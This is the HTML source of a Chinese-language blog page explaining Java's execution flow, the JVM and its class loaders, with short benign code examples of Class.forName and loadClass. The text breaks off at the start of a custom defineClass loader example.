<!doctype html>
<html lang="zh-CN" data-theme="light">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="generator" content="VuePress 2.0.0-rc.17" />
    <meta name="theme" content="VuePress Theme Hope 2.0.0-rc.58" />
    <style>
      :root {
        --vp-c-bg: #fff;
      }

      [data-theme="dark"] {
        --vp-c-bg: #1b1b1f;
      }

      html,
      body {
        background: var(--vp-c-bg);
      }
    </style>
    <script>
      const userMode = localStorage.getItem("vuepress-theme-hope-scheme");
      const systemDarkMode =
        window.matchMedia &&
        window.matchMedia("(prefers-color-scheme: dark)").matches;

      if (userMode === "dark" || (userMode !== "light" && systemDarkMode)) {
        document.documentElement.setAttribute("data-theme", "dark");
      }
    </script>
    <meta property="og:url" content="https://tvt-dog.github.io/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/JAVA%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B.html"><meta property="og:site_name" content="Ho1d_F0rward的知识库"><meta property="og:title" content="JAVA执行流程"><meta property="og:description" content="基本流程 Java 程序的运行必须经过编写、编译和运行 3 个步骤： 1、编写：是指在 Java 开发环境中进行程序代码的输入，最终形成后缀名为 .java 的 Java 源文件。 2、编译：是指使用 Java 编译器对源文件进行错误排査的过程，编译后将生成后缀名为 .class 的字节码文件，不像C语言那样生成可执行文件。 3、运行：是指使用 Jav..."><meta property="og:type" content="article"><meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/27874700/1722501220759-748c6596-ae13-4b6c-97cc-3fada58a6ca6.png"><meta property="og:locale" content="zh-CN"><script type="application/ld+json">{"@context":"https://schema.org","@type":"Article","headline":"JAVA执行流程","image":["https://cdn.nlark.com/yuque/0/2024/png/27874700/1722501220759-748c6596-ae13-4b6c-97cc-3fada58a6ca6.png","https://cdn.nlark.com/yuque/0/2024/png/27874700/1708938815728-9760af7b-1ba7-4e13-81d6-d4173e319ace.png#averageHue=%2323252b&clientId=u1907886b-bade-4&from=paste&height=487&id=u9d5071dc&originHeight=536&originWidth=2152&originalType=binary&ratio=1.100000023841858&rotation=0&showTitle=false&size=172963&status=done&style=none&taskId=u7aeed246-1c3c-4aff-b1dc-a7750b4160e&title=&width=1956.3635939605974","https://img2023.cnblogs.com/blog/3290837/202311/3290837-20231110215026626-519718966.png#id=M7XkT&originHeight=773&originWidth=671&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title="],"dateModified":null,"author":[{"@type":"Person","name":"Ho1d_F0rward","url":"https://tvt-dog.github.io/TvT-dog/","email":"outlook_39ae1e67a9a1791b@outlook.com"}]}</script><link rel="icon" href="/TvT-dog/./.vuepress/public/logo.png"><title>JAVA执行流程 | Ho1d_F0rward的知识库</title><meta name="description" content="基本流程 Java 程序的运行必须经过编写、编译和运行 3 个步骤： 1、编写：是指在 Java 开发环境中进行程序代码的输入，最终形成后缀名为 .java 的 Java 源文件。 2、编译：是指使用 Java 编译器对源文件进行错误排査的过程，编译后将生成后缀名为 .class 的字节码文件，不像C语言那样生成可执行文件。 3、运行：是指使用 Jav...">
    <link rel="preload" href="/TvT-dog/assets/style-CHDXZQdH.css" as="style"><link rel="stylesheet" href="/TvT-dog/assets/style-CHDXZQdH.css">
    <link rel="modulepreload" href="/TvT-dog/assets/app--ZYjmNcq.js"><link rel="modulepreload" href="/TvT-dog/assets/JAVA执行流程.html-DFyuLRSP.js"><link rel="modulepreload" href="/TvT-dog/assets/plugin-vue_export-helper-DlAUqK2U.js">
    <link rel="prefetch" href="/TvT-dog/assets/index.html-Cl_ZAxKK.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Nginx.html-DyWoU15B.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Protobuf.html-BXQttfAt.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/开发.html-CQc6Eynj.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/GO中GRPC.html-BugQwBPY.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/GO中的RPC.html-CRIg9gPc.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/GO多线程.html-2iDQ4CDf.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Go语言基础.html-t3_TEwdR.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Gradle学习.html-BsWJjJDD.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/JAVA反射.html-D15YjdJo.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/JUnit.html-QR8qplM5.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java中的Grpc.html-CCZqYpIc.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java的GRPC.html-D28bRTeo.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java的Io.html-CuomMbJ_.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java的Nio.html-BAtINXir.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java的Rmi.html-CHOIYKne.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java的动态代理.html-BgwqszEq.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Lombok学习.html-4eA8KC4Z.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Mybatis学习.html-CvQ1hWaQ.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Thymeleaf学习.html-6ASgiIf1.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Tomcat.html-B8X9hGMa.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Unsafe类使用.html-BIDtQROW.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/请求处理.html-DOkM3iiO.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/SQL进阶查询.html-CeHAt7t-.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/IDA pro使用.html-BMnrVSMs.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Jadx调试.html-C_KWp9ft.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Xpose框架使用.html-DM4bbqqk.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/frida调试.html-WLCCksC_.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/安卓学习.html-ca2smXl7.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/安卓脱壳.html-DnQ6z0nE.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/WEB开发技术演变.html-COAHub7P.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/微服务.html-Bu5uRfKh.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/服务架构.html-CqeoK-qg.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/JAVA数据库.html-B_24ozMG.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/JDBC学习.html-79ILR3_x.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/SqlQueryBuilder类.html-D8pbWI0J.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java数据库框架设计.html-CfK4aIsS.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Java的Spi.html-CkvouB5l.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/Spring设计理念.html-D6dQ-K-I.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/设计思想.html-Cut-sJxI.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/404.html-DelefKQX.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-BcrMfw42.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-EbHmY7tq.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-D3C4ffF-.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-CBgQWB0I.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-BarOKvW_.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-C1nj1h8p.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-OVy3XLeI.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/index.html-Fk2VBncS.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/photoswipe.esm-GXRgw7eJ.js" as="script"><link rel="prefetch" href="/TvT-dog/assets/setupDevtools-7MC2TMWH-Cm3BPa5j.js" as="script">
  </head>
  <body>
    <div id="app"><!--[--><!--[--><!--[--><span tabindex="-1"></span><a href="#main-content" class="vp-skip-link sr-only">跳至主要內容</a><!--]--><div class="theme-container external-link-icon has-toc" vp-container><!--[--><header id="navbar" class="vp-navbar" vp-navbar><div class="vp-navbar-start"><button type="button" class="vp-toggle-sidebar-button" title="Toggle Sidebar"><span class="icon"></span></button><!----><!--[--><a class="route-link vp-brand" href="/TvT-dog/" aria-label="带我回家"><!----><!----><span class="vp-site-name">Ho1d_F0rward的知识库</span></a><!--]--><!----></div><div class="vp-navbar-center"><!----><!--[--><!----><!--]--><!----></div><div class="vp-navbar-end"><!----><!--[--><!----><div class="vp-nav-item vp-action"><a class="vp-action-link" href="https://github.com/vuepress-theme-hope/vuepress-theme-hope" target="_blank" rel="noopener noreferrer" aria-label="GitHub"><svg xmlns="http://www.w3.org/2000/svg" class="icon github-icon" viewBox="0 0 1024 1024" fill="currentColor" aria-label="github icon" name="github" style="width:1.25rem;height:1.25rem;vertical-align:middle;"><path d="M511.957 21.333C241.024 21.333 21.333 240.981 21.333 512c0 216.832 140.544 400.725 335.574 465.664 24.49 4.395 32.256-10.07 32.256-23.083 0-11.69.256-44.245 0-85.205-136.448 29.61-164.736-64.64-164.736-64.64-22.315-56.704-54.4-71.765-54.4-71.765-44.587-30.464 3.285-29.824 3.285-29.824 49.195 3.413 75.179 50.517 75.179 50.517 43.776 75.008 114.816 53.333 142.762 40.79 4.523-31.66 17.152-53.377 31.19-65.537-108.971-12.458-223.488-54.485-223.488-242.602 0-53.547 19.114-97.323 50.517-131.67-5.035-12.33-21.93-62.293 4.779-129.834 0 0 41.258-13.184 134.912 50.346a469.803 469.803 0 0 1 122.88-16.554c41.642.213 83.626 5.632 122.88 16.554 93.653-63.488 134.784-50.346 134.784-50.346 26.752 67.541 9.898 117.504 4.864 129.834 31.402 34.347 50.474 78.123 50.474 131.67 0 188.586-114.73 230.016-224.042 242.09 17.578 15.232 33.578 44.672 33.578 90.454v135.85c0 13.142 7.936 27.606 32.854 22.87C862.25 912.597 1002.667 728.747 1002.667 512c0-271.019-219.648-490.667-490.71-490.667z"></path></svg></a></div><div class="vp-nav-item hide-in-mobile"><button type="button" class="vp-outlook-button" tabindex="-1" aria-hidden="true"><svg xmlns="http://www.w3.org/2000/svg" class="icon outlook-icon" viewBox="0 0 1024 1024" fill="currentColor" aria-label="outlook icon" name="outlook"><path d="M224 800c0 9.6 3.2 44.8 6.4 54.4 6.4 48-48 76.8-48 76.8s80 41.6 147.2 0 134.4-134.4 38.4-195.2c-22.4-12.8-41.6-19.2-57.6-19.2C259.2 716.8 227.2 761.6 224 800zM560 675.2l-32 51.2c-51.2 51.2-83.2 32-83.2 32 25.6 67.2 0 112-12.8 128 25.6 6.4 51.2 9.6 80 9.6 54.4 0 102.4-9.6 150.4-32l0 0c3.2 0 3.2-3.2 3.2-3.2 22.4-16 12.8-35.2 6.4-44.8-9.6-12.8-12.8-25.6-12.8-41.6 0-54.4 60.8-99.2 137.6-99.2 6.4 0 12.8 0 22.4 0 12.8 0 38.4 9.6 48-25.6 0-3.2 0-3.2 3.2-6.4 0-3.2 3.2-6.4 3.2-6.4 6.4-16 6.4-16 6.4-19.2 9.6-35.2 16-73.6 16-115.2 0-105.6-41.6-198.4-108.8-268.8C704 396.8 560 675.2 560 675.2zM224 419.2c0-28.8 22.4-51.2 51.2-51.2 28.8 0 51.2 22.4 51.2 51.2 0 28.8-22.4 51.2-51.2 51.2C246.4 470.4 224 448 224 419.2zM320 284.8c0-22.4 19.2-41.6 41.6-41.6 22.4 0 41.6 19.2 41.6 41.6 0 22.4-19.2 41.6-41.6 41.6C339.2 326.4 320 307.2 320 284.8zM457.6 208c0-12.8 12.8-25.6 25.6-25.6 12.8 0 25.6 12.8 25.6 25.6 0 12.8-12.8 25.6-25.6 25.6C470.4 233.6 457.6 220.8 457.6 208zM128 505.6C128 592 153.6 672 201.6 736c28.8-60.8 112-60.8 124.8-60.8-16-51.2 16-99.2 16-99.2l316.8-422.4c-48-19.2-99.2-32-150.4-32C297.6 118.4 128 291.2 128 505.6zM764.8 86.4c-22.4 19.2-390.4 518.4-390.4 518.4-22.4 28.8-12.8 76.8 22.4 99.2l9.6 6.4c35.2 22.4 80 12.8 99.2-25.6 0 0 6.4-12.8 9.6-19.2 54.4-105.6 275.2-524.8 288-553.6 6.4-19.2-3.2-32-19.2-32C777.6 76.8 771.2 80 764.8 86.4z"></path></svg><div class="vp-outlook-dropdown"><!----></div></button></div><!----><!--]--><!----><button type="button" class="vp-toggle-navbar-button" aria-label="Toggle Navbar" aria-expanded="false" aria-controls="nav-screen"><span><span class="vp-top"></span><span class="vp-middle"></span><span class="vp-bottom"></span></span></button></div></header><!----><!--]--><!----><div class="toggle-sidebar-wrapper"><span class="arrow start"></span></div><aside id="sidebar" class="vp-sidebar" vp-sidebar><!----><ul class="vp-sidebar-links"><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/" aria-label="主页"><!--[--><span class="font-icon icon fa-fw fa-sm fas fa-home" style=""></span><!--]-->主页<!----></a></li><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable active" type="button"><!----><span class="vp-sidebar-title">开发</span><span class="vp-arrow down"></span></button><ul class="vp-sidebar-links"><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable" type="button"><!----><span class="vp-sidebar-title">安卓</span><span class="vp-arrow end"></span></button><!----></section></li><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable" type="button"><!----><span class="vp-sidebar-title">服务架构</span><span class="vp-arrow end"></span></button><!----></section></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/%E5%BC%80%E5%8F%91.html" aria-label="开发目录"><!---->开发目录<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Protobuf.html" aria-label="什么是protobuf"><!---->什么是protobuf<!----></a></li><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable" type="button"><!----><span class="vp-sidebar-title">Go开发</span><span class="vp-arrow end"></span></button><!----></section></li><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable active" type="button"><!----><span class="vp-sidebar-title">Java开发</span><span class="vp-arrow down"></span></button><ul class="vp-sidebar-links"><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E7%9A%84%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86.html" aria-label="代理模式"><!---->代理模式<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E7%9A%84GRPC.html" aria-label="环境配置"><!---->环境配置<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/%E8%AF%B7%E6%B1%82%E5%A4%84%E7%90%86.html" aria-label="请求处理"><!---->请求处理<!----></a></li><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable" type="button"><!----><span class="vp-sidebar-title">设计思想</span><span class="vp-arrow end"></span></button><!----></section></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E7%9A%84Rmi.html" aria-label="什么是Rmi"><!---->什么是Rmi<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Gradle%E5%AD%A6%E4%B9%A0.html" aria-label="Gradle学习"><!---->Gradle学习<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E7%9A%84Io.html" aria-label="Java IO基础"><!---->Java IO基础<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E7%9A%84Nio.html" aria-label="Java的Nio"><!---->Java的Nio<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/JAVA%E5%8F%8D%E5%B0%84.html" aria-label="JAVA反射"><!---->JAVA反射<!----></a></li><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable" type="button"><!----><span class="vp-sidebar-title">Java数据库</span><span class="vp-arrow end"></span></button><!----></section></li><li><a class="route-link route-link-active auto-link vp-sidebar-link active" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/JAVA%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B.html" aria-label="JAVA执行流程"><!---->JAVA执行流程<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E4%B8%AD%E7%9A%84Grpc.html" aria-label="Java中的Grpc"><!---->Java中的Grpc<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/JUnit.html" aria-label="JUnit"><!---->JUnit<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Lombok%E5%AD%A6%E4%B9%A0.html" aria-label="Lombok学习"><!---->Lombok学习<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Mybatis%E5%AD%A6%E4%B9%A0.html" aria-label="Mybatis学习"><!---->Mybatis学习<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Thymeleaf%E5%AD%A6%E4%B9%A0.html" aria-label="Thymeleaf学习"><!---->Thymeleaf学习<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Tomcat.html" aria-label="Tomcat学习"><!---->Tomcat学习<!----></a></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Unsafe%E7%B1%BB%E4%BD%BF%E7%94%A8.html" aria-label="Unsafe类使用"><!---->Unsafe类使用<!----></a></li></ul></section></li><li><a class="route-link auto-link vp-sidebar-link" href="/TvT-dog/%E5%BC%80%E5%8F%91/Nginx.html" aria-label="Nginx 的作用"><!---->Nginx 的作用<!----></a></li><li><section class="vp-sidebar-group"><button class="vp-sidebar-header clickable" type="button"><!----><span class="vp-sidebar-title">SQL学习</span><span class="vp-arrow end"></span></button><!----></section></li></ul></section></li></ul><!----></aside><!--[--><main id="main-content" class="vp-page"><!--[--><!----><!----><nav class="vp-breadcrumb disable"></nav><div class="vp-page-title"><h1><!---->JAVA执行流程</h1><div class="page-info"><span class="page-author-info" aria-label="作者🖊" data-balloon-pos="up"><svg xmlns="http://www.w3.org/2000/svg" class="icon author-icon" viewBox="0 0 1024 1024" fill="currentColor" aria-label="author icon" name="author"><path d="M649.6 633.6c86.4-48 147.2-144 147.2-249.6 0-160-128-288-288-288s-288 128-288 288c0 108.8 57.6 201.6 147.2 249.6-121.6 48-214.4 153.6-240 288-3.2 9.6 0 19.2 6.4 25.6 3.2 9.6 12.8 12.8 22.4 12.8h704c9.6 0 19.2-3.2 25.6-12.8 6.4-6.4 9.6-16 6.4-25.6-25.6-134.4-121.6-240-243.2-288z"></path></svg><span><a class="page-author-item" href="https://tvt-dog.github.io/TvT-dog/" target="_blank" rel="noopener noreferrer">Ho1d_F0rward</a></span><span property="author" content="Ho1d_F0rward"></span></span><!----><!----><!----><span class="page-reading-time-info" aria-label="阅读时间⌛" data-balloon-pos="up"><svg xmlns="http://www.w3.org/2000/svg" class="icon timer-icon" viewBox="0 0 1024 1024" fill="currentColor" aria-label="timer icon" name="timer"><path d="M799.387 122.15c4.402-2.978 7.38-7.897 7.38-13.463v-1.165c0-8.933-7.38-16.312-16.312-16.312H256.33c-8.933 0-16.311 7.38-16.311 16.312v1.165c0 5.825 2.977 10.874 7.637 13.592 4.143 194.44 97.22 354.963 220.201 392.763-122.204 37.542-214.893 196.511-220.2 389.397-4.661 5.049-7.638 11.651-7.638 19.03v5.825h566.49v-5.825c0-7.379-2.849-13.981-7.509-18.9-5.049-193.016-97.867-351.985-220.2-389.527 123.24-37.67 216.446-198.453 220.588-392.892zM531.16 450.445v352.632c117.674 1.553 211.787 40.778 211.787 88.676H304.097c0-48.286 95.149-87.382 213.728-88.676V450.445c-93.077-3.107-167.901-81.297-167.901-177.093 0-8.803 6.99-15.793 15.793-15.793 8.803 0 15.794 6.99 15.794 15.793 0 80.261 63.69 145.635 142.01 145.635s142.011-65.374 142.011-145.635c0-8.803 6.99-15.793 15.794-15.793s15.793 6.99 15.793 15.793c0 95.019-73.789 172.82-165.96 177.093z"></path></svg><span>大约 11 分钟</span><meta property="timeRequired" content="PT11M"></span><!----><!----></div><hr></div><div class="vp-toc-placeholder"><aside id="toc"><!----><div class="vp-toc-header">此页内容<button type="button" class="print-button" title="打印"><svg xmlns="http://www.w3.org/2000/svg" class="icon print-icon" viewBox="0 0 1024 1024" fill="currentColor" aria-label="print icon" name="print"><path d="M819.2 364.8h-44.8V128c0-17.067-14.933-32-32-32H281.6c-17.067 0-32 14.933-32 32v236.8h-44.8C145.067 364.8 96 413.867 96 473.6v192c0 59.733 49.067 108.8 108.8 108.8h44.8V896c0 17.067 14.933 32 32 32h460.8c17.067 0 32-14.933 32-32V774.4h44.8c59.733 0 108.8-49.067 108.8-108.8v-192c0-59.733-49.067-108.8-108.8-108.8zM313.6 160h396.8v204.8H313.6V160zm396.8 704H313.6V620.8h396.8V864zM864 665.6c0 25.6-19.2 44.8-44.8 44.8h-44.8V588.8c0-17.067-14.933-32-32-32H281.6c-17.067 0-32 14.933-32 32v121.6h-44.8c-25.6 0-44.8-19.2-44.8-44.8v-192c0-25.6 19.2-44.8 44.8-44.8h614.4c25.6 0 44.8 19.2 44.8 44.8v192z"></path></svg></button><div class="arrow end"></div></div><div class="vp-toc-wrapper"><ul class="vp-toc-list"><!--[--><li class="vp-toc-item"><a class="route-link vp-toc-link level2" href="#java类加载方式">Java类加载方式</a></li><li><ul class="vp-toc-list"><!--[--><li class="vp-toc-item"><a class="route-link vp-toc-link level3" href="#隐式加载">隐式加载</a></li><!----><!--]--><!--[--><li class="vp-toc-item"><a class="route-link vp-toc-link level3" href="#显示加载">显示加载</a></li><!----><!--]--></ul></li><!--]--><!--[--><li class="vp-toc-item"><a class="route-link vp-toc-link level2" href="#自定义类加载器">自定义类加载器</a></li><!----><!--]--><!--[--><li class="vp-toc-item"><a class="route-link vp-toc-link level2" href="#双亲委派机制">双亲委派机制</a></li><!----><!--]--><!--[--><li class="vp-toc-item"><a class="route-link vp-toc-link level2" href="#类加载方式">类加载方式</a></li><!----><!--]--><!--[--><li class="vp-toc-item"><a class="route-link vp-toc-link level2" href="#自定义加载器">自定义加载器</a></li><!----><!--]--></ul><div class="vp-toc-marker" style="top:-1.7rem;"></div></div><!----></aside></div><!----><div class="theme-hope-content" vp-content><h1 id="基本流程" tabindex="-1"><a class="header-anchor" href="#基本流程"><span>基本流程</span></a></h1><p>Java 程序的运行必须经过编写、编译和运行 3 个步骤：</p><p>1、编写：是指在 Java 开发环境中进行程序代码的输入，最终形成后缀名为 .java 的 Java 源文件。 2、编译：是指使用 Java 编译器对源文件进行错误排査的过程，编译后将生成后缀名为 .class 的字节码文件，不像C语言那样生成可执行文件。 3、运行：是指使用 Java 解释器将字节码文件翻译成机器代码，执行并显示结果。</p><figure><img src="https://cdn.nlark.com/yuque/0/2024/png/27874700/1722501220759-748c6596-ae13-4b6c-97cc-3fada58a6ca6.png" alt="" tabindex="0" loading="lazy"><figcaption></figcaption></figure><p>Java 虚拟机（JVM）是运行 Java 程序的软件环境，Java 解释器是 Java 虚拟机的一部分。在运行 Java 程序时，首先会启动 JVM，然后由它来负责解释执行 Java 的字节码程序，并且 Java 字节码程序只能运行于 JVM 之上。这样利用 JVM 就可以把 Java 字节码程序和具体的硬件平台以及操作系统环境分隔开来，只要在不同的计算机上安装了针对特定平台的 JVM，Java 程序就可以运行，而不用考虑当前具体的硬件平台及操作系统环境，也不用考虑字节码文件是在何种平台上生成的。</p><h1 id="类加载器" tabindex="-1"><a class="header-anchor" href="#类加载器"><span>类加载器</span></a></h1><p>Java 的类加载器是一个重要的组件,负责在程序运行时动态加载 Java 类文件到 Java 虚拟机中。</p><p>java中有三种类加载器</p><ul><li>Bootstrap ClassLoader (引导类加载器) 该类加载器实现于JVM层，采用C++编写</li><li>Extension ClassLoader (扩展类加载器)</li><li>App ClassLoader (系统类加载器) 默认的类加载器</li></ul><blockquote><p>BootstrapClassLoader只加载包名为java、javax、sun等开头的类)。</p><p>扩展类加载器(ExtensionsClassLoader)，由sun.misc.Launcher$ExtClassLoader类实现，用来在/jre/lib/ext或者java.ext.dirs中指明的目录加载java的扩展库.</p><p>App类加载器/系统类加载器（AppClassLoader），由sun.misc.Launcher$AppClassLoader实现，一般通过通过(java.class.path或者Classpath环境变量)来加载Java类，也就是我们常说的classpath路径。</p></blockquote><h2 id="java类加载方式" tabindex="-1"><a class="header-anchor" href="#java类加载方式"><span>Java类加载方式</span></a></h2><p>同时你可能会有疑问，为什么平时没有看到这些类的一个使用。其实我们一般情况下都是使用的隐式的一个类加载方式。</p><h3 id="隐式加载" tabindex="-1"><a class="header-anchor" href="#隐式加载"><span>隐式加载</span></a></h3><p>通过创建类的实例、访问类的静态成员、继承类或实现接口等方式隐式加载类。</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>// 创建类的实例</span></span>
<span class="line"><span>MyClass obj = new MyClass();</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// 访问类的静态成员</span></span>
<span class="line"><span>int value = MyClass.staticField;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// 继承类</span></span>
<span class="line"><span>class SubClass extends MyClass { }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// 实现接口</span></span>
<span class="line"><span>class MyImplementation implements MyInterface { }</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><h3 id="显示加载" tabindex="-1"><a class="header-anchor" href="#显示加载"><span>显示加载</span></a></h3><h4 id="classloader类加载" tabindex="-1"><a class="header-anchor" href="#classloader类加载"><span>ClassLoader类加载</span></a></h4><h5 id="class-forname加载" tabindex="-1"><a class="header-anchor" href="#class-forname加载"><span>Class.forName加载</span></a></h5><p>通过 Class.forName() 方法显式加载类。这种方式会触发类的初始化过程。</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>String className = &quot;com.example.MyClass&quot;;</span></span>
<span class="line"><span>Class&lt;?&gt; clazz = Class.forName(className);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>this.getClass().getClassLoader().loadClass(className);</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>如果不希望初始化类可以使用Class.forName(&quot;类名&quot;, 是否初始化类, 类加载器)，而ClassLoader.loadClass默认不会初始化类方法。 defineClass方法通常被自定义的类加载器重写，用于将字节数组转换为Class对象,这对于动态加载类或者加载非标准的类文件格式非常有用。</p><p>如下展示了如何使用自定义的类加载器和defineClass方法来定义类: 详细加载流程</p><ol><li>我们使用loadClass方法进行加载后，会使用findLoadedClass来检查类是否加载过，如果已经被jvm加载过来，就直接会返回类的对象。</li><li>如果加载失败就会调用自身的findclass。同时注意如果没有重写了findClass方法，那么直接返回类加载失败异常。</li><li>loadClass的时候传入的resolve参数为true，那么还需要调用resolveClass方法链接类，默认为false。</li></ol><h5 id="自定义加载器-直接利用defineclass" tabindex="-1"><a class="header-anchor" href="#自定义加载器-直接利用defineclass"><span>自定义加载器(直接利用defineClass)</span></a></h5><p>其中defineClass方法通常被自定义的类加载器重写，用于将字节数组转换为Class对象,这对于动态加载类或者加载非标准的类文件格式非常有用。</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>public class ClassLoaderStudy extends ClassLoader {</span></span>
<span class="line"><span>    private static final String testClassName = &quot;top.longlone.Hello&quot;;</span></span>
<span class="line"><span>   </span></span>
